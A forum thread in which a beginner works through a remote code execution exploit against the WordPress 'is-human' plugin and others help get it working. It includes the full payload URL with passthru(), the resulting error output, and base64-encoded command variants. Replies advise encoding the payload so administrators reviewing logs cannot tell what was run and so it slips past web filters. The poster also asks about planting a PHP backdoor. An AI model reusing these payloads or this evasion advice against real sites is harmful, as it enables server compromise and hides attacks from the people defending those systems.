Hi,
I'm playing around with my wordpress installation trying out various exploits found on exploit-db.  However, I'm pretty new to pentesting web applications.

I'm trying out this:  http://www.exploit-db.com/exploits/17299/

Running "http://localhost/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();passthru(ipconfig);error" gives me the ipconfig of the local machine no problems.

However, i would like to get spacing in there. I tried URL encoding (likeipconfig%20/all) but that didn't seem to work. I'd like to do "dir C:\" for example. Also, could i run other types of code in there to upload php backdoor or connect and download it from ftp to webroot or similar?

Any help please?

Error message using URL encoding:

eprecated: Function set_magic_quotes_runtime() is deprecated in C:\xampp\htdocs\wp-settings.php on line 32
Array
Warning: Division by zero in C:\xampp\htdocs\wp-content\plugins\is-human\engine.php(29) : eval()'d code on line 1

Warning: passthru() [function.passthru]: Cannot execute a blank command in C:\xampp\htdocs\wp-content\plugins\is-human\engine.php(29) : eval()'d code on line 1

Warning: error_log() expects at least 1 parameter, 0 given in C:\xampp\htdocs\wp-content\plugins\is-human\engine.php(29) : eval()'d code on line 1

I'm also guessing (not sitting by a machine to try it, right the moment) that it doesn't like the / character, and you might need to encode that, as well, if simply using the %20 for the space doesn't work.

Part of your error info lends to my thinking, too:

"Warning: Division by zero in C:\xampp\htdocs\wp-content\plugins\is-human\engine.php(29) : eval()'d code on line 1"

It's misinterpreting the / as a division, and turning your whole command into gibberish:

"Warning: passthru() [function.passthru]: Cannot execute a blank command in C:\xampp\htdocs\wp-content\plugins\is-human\engine.php(29) : eval()'d code on line 1"

MaXe has a good point, and beat me to it.  Was about to reply again, and simply suggest that best practice would be to encode the whole string, anyway. 

Multiple reasons:

1.) gets you past errors like you hit

2.) less chance that an admin reviewing a log would have a clue what it was you actually did

3.) gets you past other web filtering solutions they might have in place.

4.) it's way cooler anyway 

Hehe. Absolutely way cooler in hex!!   I really appreciate the feedback!
I will be testing this at work tomorrow and tell you how it went!
Much obliged!

I'm not sure if passthru() Accepts that kind of input, even though it should, but then again.. It takes arguments and executes them as commands on the target Operating System, so if it doesn't convert the input, then an error would be returned.

Try: passthru(base64_decode("bHMgLWFs"))
Or: passthru(base64_decode('bHMgLWFs'))
(This should execute an "ls -al" command, note there's a space included.)

For that kind hexadecimal input, you will _always_ need to encapsulate the input in quotes " in most cases, using apostrophes ' may not work, even though it should!   (I think I encountered a problem like this once, a long time ago, not 100% sure since it should be the same, in most cases where variables and other special characters are not used.)

Note:
Hmm, but after thinking about the first error for a while, the error could be caused due to you use ", and you should try to use ' then. I know it sounds strange, but all I can do is guess when I don't have the source code of that engine.php script